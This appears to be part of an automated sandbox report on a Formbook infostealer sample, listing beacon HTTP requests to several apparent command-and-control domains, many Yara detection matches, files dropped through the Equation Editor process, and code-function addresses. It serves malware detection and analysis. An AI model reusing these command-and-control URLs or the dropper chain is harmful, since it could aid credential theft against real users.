          Source: global traffic | HTTP traffic detected: GET /nc39/?dZzp=SWFeU2CogosqNHNVddu3ZSSiHhx9YO5iIr2cqOlbYRvwZbqC6rJ+ufxHmetPGTnqGTEg+w==&3f=j6AdrVwh HTTP/1.1 | Host: www.arjimni.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /nc39/?dZzp=CWrF3poHj2MNQw4FqfZfOWFDC9Dy9qwGAafxJUMNhkwMJpF8RUBmV1WHKbaf9sKHKobluA==&3f=j6AdrVwh HTTP/1.1 | Host: www.contractornurd.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /nc39/?dZzp=Td3Z6WACWlvn2oxJ5kz3cAAvTYM+vx9a0mv4ko18Io/mhbtUurGZKYFJi0A4+N8FDsGh8g==&3f=j6AdrVwh HTTP/1.1 | Host: www.tw-life.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /nc39/?dZzp=SW2DOu4AoD1tt2PaEEhiNvSk2qD2OpQeAcSR0NEUE8SsNGniN/+F24NqGXKX7Cj1ljS/6Q==&3f=j6AdrVwh HTTP/1.1 | Host: www.yiwanggkm.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_0040580F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,4_2_0040580F

          E-Banking Fraud

          Source: Yara match | File source: 6.0.yldnat.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.2.yldnat.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.yldnat.exe.120000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.yldnat.exe.120000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.0.yldnat.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.2.yldnat.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.0.yldnat.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.0.yldnat.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.0.yldnat.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000008.00000002.1175423013.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000002.1175517654.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.983399787.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000000.982109510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000000.1012975505.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.1032166526.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000000.1024425011.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.1032081329.00000000000C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000000.981158681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          System Summary

          Source: 6.0.yldnat.exe.400000.9.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.0.yldnat.exe.400000.9.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.yldnat.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.yldnat.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.yldnat.exe.120000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.yldnat.exe.120000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.yldnat.exe.120000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.yldnat.exe.120000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.0.yldnat.exe.400000.9.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.0.yldnat.exe.400000.9.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.yldnat.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.yldnat.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.0.yldnat.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.0.yldnat.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.0.yldnat.exe.400000.7.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.0.yldnat.exe.400000.7.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.1175423013.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.1175423013.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.1175517654.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.1175517654.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.983399787.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.983399787.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.982109510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.982109510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000000.1012975505.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000000.1012975505.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.1032166526.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.1032166526.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000000.1024425011.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000000.1024425011.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.1032081329.00000000000C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.1032081329.00000000000C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.981158681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.981158681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
          Source: 6.0.yldnat.exe.400000.9.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.0.yldnat.exe.400000.9.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.yldnat.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.yldnat.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.yldnat.exe.120000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.yldnat.exe.120000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.yldnat.exe.120000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.yldnat.exe.120000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.0.yldnat.exe.400000.9.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.0.yldnat.exe.400000.9.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.yldnat.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.yldnat.exe.400000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.0.yldnat.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.0.yldnat.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.0.yldnat.exe.400000.7.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.0.yldnat.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.1175423013.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.1175423013.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.1175517654.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.1175517654.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.983399787.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.983399787.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.982109510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.982109510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000000.1012975505.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000000.1012975505.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.1032166526.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.1032166526.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000000.1024425011.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000000.1024425011.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.1032081329.00000000000C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.1032081329.00000000000C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.981158681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.981158681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\Public\vbc.exe Code function: 4_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 5_2_013B1890
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 5_2_013BC3BD
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 5_2_013BA184
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 5_2_013BB3F1
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 5_2_013B9C12
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 5_2_013B96A0
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 5_2_013B7E88
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 5_2_00110A41
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_00401030
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0041E1F5
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0041E9FF
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_00409220
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0040DBC0
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0041DBBD
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_00402D89
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_00402D90
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0041EF50
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0041DF0D
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0041E79A
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_00402FB0
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_013BA184
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_013B1890
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_013BC3BD
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_013BB3F1
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_013B9C12
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_013B96A0
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_013B7E88
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0086E0C6
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0089D005
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_00873040
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0088905A
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0086E2E9
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_00911238
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_009163BF
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0086F3CF
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_008963DB
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_00872305
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_00877353
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_008BA37B
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_00881489
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_008A5485
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_008F443E
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_008AD47D
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0088C5F0
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0087351F
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_008B6540
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_00874680
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0087E6C1
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_00912622
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_008BA634
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_008F579A
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe Code function: 6_2_0087C7BC
